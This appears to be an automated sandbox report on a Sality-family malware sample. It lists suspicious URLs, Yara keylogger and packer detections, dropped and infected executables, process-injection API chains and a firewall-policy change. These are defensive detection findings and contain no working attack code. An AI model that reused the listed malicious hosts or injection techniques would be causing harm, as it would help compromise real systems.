Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.careerdesk.org/images/xs.jpg
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000111D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.careerdesk.org/images/xs.jpg?5059c3=10531718
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000111D000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2255038602.000000000760A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.000000000760A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.careerdesk.org/images/xs.jpg?ad5654=34079484
Source: SciTE.exe.2.dr String found in binary or memory: http://www.develop.com
Source: SciTE.exe.2.dr String found in binary or memory: http://www.develop.comDeepak
Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.klkjwre9fqwieluoi.info/
Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.klkjwre9fqwieluoi.info/amsint32.sysGetSystemDirectoryAdrivers
Source: SciTE.exe.2.dr String found in binary or memory: http://www.lua.org
Source: SciTE.exe.2.dr String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.2.dr String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.2.dr String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.2.dr String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.2.dr String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.2.dr String found in binary or memory: http://www.spaceblue.comMathias
Source: 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000C69000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://www.youku.com/playlist_show/id_25824322.html
Source: rksowY.exe, 00000002.00000003.2178512612.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000002.2243579607.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.comrobat
Source: SciTE.exe.2.dr String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.2.dr String found in binary or memory: https://www.smartsharesystems.com/Morten
Installs a raw input device (often for capturing keystrokes)
Source: SciTE.exe.2.dr Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \ memstr_bae7b752-b
Yara detected Keylogger Generic
Source: Yara match File source: 0.2.1.0.0.2.exe.400000.0.unpack, type: UNPACKEDPE

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0.2.1.0.0.2.exe.111ff18.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality Author: ditekSHen
Source: 0.2.1.0.0.2.exe.2be2300.11.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality Author: ditekSHen
Source: 0.2.1.0.0.2.exe.2be25f4.12.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality Author: ditekSHen
Source: 0.2.1.0.0.2.exe.2b60000.10.unpack, type: UNPACKEDPE Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality Author: ditekSHen
Source: 0.2.1.0.0.2.exe.10eb0bc.8.unpack, type: UNPACKEDPE Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\winmefmb.exe, type: DROPPED Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality Author: ditekSHen
Source: C:\iuepn.exe, type: DROPPED Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality Author: ditekSHen
PE file contains section with special chars
Source: MyProg.exe.2.dr Static PE information: section name: Y|uR
PE file has a writeable .text section
Source: iuepn.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rksowY.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: winmefmb.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Detected potential crypto function
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02B69652 0_2_02B69652
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02B722A0 0_2_02B722A0
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02B66A85 0_2_02B66A85
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Code function: 2_2_005B6076 2_2_005B6076
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Code function: 2_2_005B6D00 2_2_005B6D00
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\rksowY.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
One or more processes crash
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 1328
PE file contains executable resources (Code or Archives)
Source: MyProg.exe.2.dr Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
Sample file is different than original file name gathered from version info
Source: 1.0.0.2.exe Binary or memory string: \StringFileInfo\%s\OriginalFilename vs 1.0.0.2.exe
Source: 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000CC3000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: \StringFileInfo\%s\OriginalFilename vs 1.0.0.2.exe
Source: 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000CC3000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: N/A%02X-%02X-%02X-%02X-%02X-%02Xwww.dywt.com.cnGlobalMemoryStatusExKernel32.dllx86 Family %s Model %s Stepping %s%08X-%08X-%08X-%08X\StringFileInfo\%s\Comments\StringFileInfo\%s\ProductVersion\StringFileInfo\%s\ProductName\StringFileInfo\%s\OriginalFilename\StringFileInfo\%s\LegalTrademarks\StringFileInfo\%s\LegalCopyright\StringFileInfo\%s\InternalName\StringFileInfo\%s\FileDescription\StringFileInfo\%s\CompanyName%s\StringFileInfo\%s\FileVersion040904E4000%x, \VarFileInfo\TranslationopenMicrosoft Internet Explorer vs 1.0.0.2.exe
Source: 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D37000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilename_R2Launcher.exe@ vs 1.0.0.2.exe
Source: 1.0.0.2.exe Binary or memory string: OriginalFilename_R2Launcher.exe@ vs 1.0.0.2.exe
Uses 32bit PE files
Source: 1.0.0.2.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Yara signature match
Source: 0.2.1.0.0.2.exe.111ff18.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_EXE_Packed_SimplePolyuser author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality
Source: 0.2.1.0.0.2.exe.2be2300.11.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_EXE_Packed_SimplePolyuser author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality
Source: 0.2.1.0.0.2.exe.2be25f4.12.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_EXE_Packed_SimplePolyuser author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality
Source: 0.2.1.0.0.2.exe.2b60000.10.unpack, type: UNPACKEDPE Matched rule: INDICATOR_EXE_Packed_SimplePolyuser author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality
Source: 0.2.1.0.0.2.exe.10eb0bc.8.unpack, type: UNPACKEDPE Matched rule: INDICATOR_EXE_Packed_SimplePolyuser author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality
Source: C:\Users\user\AppData\Local\Temp\winmefmb.exe, type: DROPPED Matched rule: INDICATOR_EXE_Packed_SimplePolyuser author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality
Source: C:\iuepn.exe, type: DROPPED Matched rule: INDICATOR_EXE_Packed_SimplePolyuser author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality
Source: rksowY.exe.0.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: iuepn.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rksowY.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: winmefmb.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: iuepn.exe.0.dr Static PE information: Section .text
Source: winmefmb.exe.0.dr Static PE information: Section .text
Source: rksowY.exe.0.dr Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: classification engine Classification label: mal100.spre.troj.evad.winEXE@5/15@10/5
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02B6CC92 LookupPrivilegeValueA,AdjustTokenPrivileges,AdjustTokenPrivileges,FindCloseChangeNotification,GetTokenInformation,GetTokenInformation,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,FindCloseChangeNotification, 0_2_02B6CC92
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Code function: 2_2_005B119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle, 2_2_005B119F
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02B6D2B0 CreateToolhelp32Snapshot,Process32First,Process32Next,CreateMutexA,FindCloseChangeNotification, 0_2_02B6D2B0
Source: C:\Users\user\Desktop\1.0.0.2.exe File created: C:\Users\user\Desktop\VF.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Mutant created: \Sessions\1\BaseNamedObjects\csrss.exeM_496_
Source: C:\Users\user\Desktop\1.0.0.2.exe Mutant created: \Sessions\1\BaseNamedObjects\registryM_92_
Source: C:\Users\user\Desktop\1.0.0.2.exe Mutant created: \Sessions\1\BaseNamedObjects\smss.exeM_328_
Source: C:\Users\user\Desktop\1.0.0.2.exe Mutant created: \Sessions\1\BaseNamedObjects\csrss.exeM_412_
Source: C:\Users\user\Desktop\1.0.0.2.exe Mutant created: \Sessions\1\BaseNamedObjects\wininit.exeM_488_
Source: C:\Users\user\Desktop\1.0.0.2.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_928_
Source: C:\Users\user\Desktop\1.0.0.2.exe Mutant created: \Sessions\1\BaseNamedObjects\fontdrvhost.exeM_780_
Source: C:\Users\user\Desktop\1.0.0.2.exe Mutant created: \Sessions\1\BaseNamedObjects\winlogon.exeM_560_
Source: C:\Users\user\Desktop\1.0.0.2.exe Mutant created: \Sessions\1\BaseNamedObjects\uxJLpe1m
Source: C:\Users\user\Desktop\1.0.0.2.exe Mutant created: \Sessions\1\BaseNamedObjects\fontdrvhost.exeM_788_
Source: C:\Users\user\Desktop\1.0.0.2.exe Mutant created: \Sessions\1\BaseNamedObjects\dwm.exeM_996_
Source: C:\Users\user\Desktop\1.0.0.2.exe Mutant created: \Sessions\1\BaseNamedObjects\lsass.exeM_652_
Source: C:\Users\user\Desktop\1.0.0.2.exe Mutant created: \Sessions\1\BaseNamedObjects\services.exeM_632_
Source: C:\Users\user\Desktop\1.0.0.2.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_868_
Source: C:\Users\user\Desktop\1.0.0.2.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_752_
Source: C:\Users\user\Desktop\1.0.0.2.exe File created: C:\Users\user\AppData\Local\Temp\rksowY.exe Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe File read: C:\Windows\system.ini Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 1.0.0.2.exe Virustotal: Detection: 86%
Source: unknown Process created: C:\Users\user\Desktop\1.0.0.2.exe "C:\Users\user\Desktop\1.0.0.2.exe"
Source: C:\Users\user\Desktop\1.0.0.2.exe Process created: C:\Users\user\AppData\Local\Temp\rksowY.exe C:\Users\user\AppData\Local\Temp\rksowY.exe
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 1328
Source: C:\Users\user\Desktop\1.0.0.2.exe Process created: C:\Users\user\AppData\Local\Temp\rksowY.exe C:\Users\user\AppData\Local\Temp\rksowY.exe Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: clinkapi.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe File written: C:\Windows\system.ini Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: 1.0.0.2.exe Static file information: File size 5242880 > 1048576
Source: 1.0.0.2.exe Static PE information: Raw size of UPX1 is bigger than: 0x100000 < 0x4cfc00
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Unpacked PE file: 2.2.rksowY.exe.5b0000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02BEBCD0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 0_2_02BEBCD0
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: pu
PE file contains sections with non-standard names
Source: 1.0.0.2.exe Static PE information: section name: pu
Source: VF.dll.0.dr Static PE information: section name: UPX2
Source: rksowY.exe.0.dr Static PE information: section name: .aspack
Source: rksowY.exe.0.dr Static PE information: section name: .adata
Source: MyProg.exe.2.dr Static PE information: section name: PELIB
Source: MyProg.exe.2.dr Static PE information: section name: Y|uR
Source: SciTE.exe.2.dr Static PE information: section name: u
Source: Uninstall.exe.2.dr Static PE information: section name: EpNuZ
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02B73600 push eax; ret 0_2_02B7362E
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02B6072E push eax; iretd 0_2_02B6072F
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Code function: 2_2_005B1638 push dword ptr [005B3084h]; ret 2_2_005B170E
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Code function: 2_2_005B2D9B push ecx; ret 2_2_005B2DAB
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Code function: 2_2_005B6014 push 005B14E1h; ret 2_2_005B6425
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Code function: 2_2_005B600A push ebp; ret 2_2_005B600D
Source: 1.0.0.2.exe Static PE information: section name: .rsrc entropy: 7.617344200663995
Source: 1.0.0.2.exe Static PE information: section name: pu entropy: 7.7594391065047255
Source: iuepn.exe.0.dr Static PE information: section name: .text entropy: 7.988165420952291
Source: rksowY.exe.0.dr Static PE information: section name: .text entropy: 7.81169422100848
Source: winmefmb.exe.0.dr Static PE information: section name: .text entropy: 7.988165420952291
Source: MyProg.exe.2.dr Static PE information: section name: Y|uR entropy: 6.934800097867026
Source: SciTE.exe.2.dr Static PE information: section name: u entropy: 6.934468071332093
Source: Uninstall.exe.2.dr Static PE information: section name: EpNuZ entropy: 6.934379233926794
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1

Persistence and Installation Behavior
barindex
Infects executable files (exe, dll, sys, html)
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe System file written: C:\Program Files\7-Zip\Uninstall.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Jump to behavior
Drops PE files
Source: C:\Users\user\Desktop\1.0.0.2.exe File created: C:\Users\user\AppData\Local\Temp\winmefmb.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe File created: C:\Program Files\7-Zip\Uninstall.exe Jump to dropped file
Source: C:\Users\user\Desktop\1.0.0.2.exe File created: C:\iuepn.exe Jump to dropped file
Source: C:\Users\user\Desktop\1.0.0.2.exe File created: C:\Users\user\Desktop\VF.dll Jump to dropped file
Source: C:\Users\user\Desktop\1.0.0.2.exe File created: C:\Users\user\AppData\Local\Temp\rksowY.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Jump to dropped file
Modifies existing windows services
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
May modify the system service descriptor table (often done to hook functions)
Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: KeServiceDescriptorTable
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 799
Source: C:\Users\user\Desktop\1.0.0.2.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
